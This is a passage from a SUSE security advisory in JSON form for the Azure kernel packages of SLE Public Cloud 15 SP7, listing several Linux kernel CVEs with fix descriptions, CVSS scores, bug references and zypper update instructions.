"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
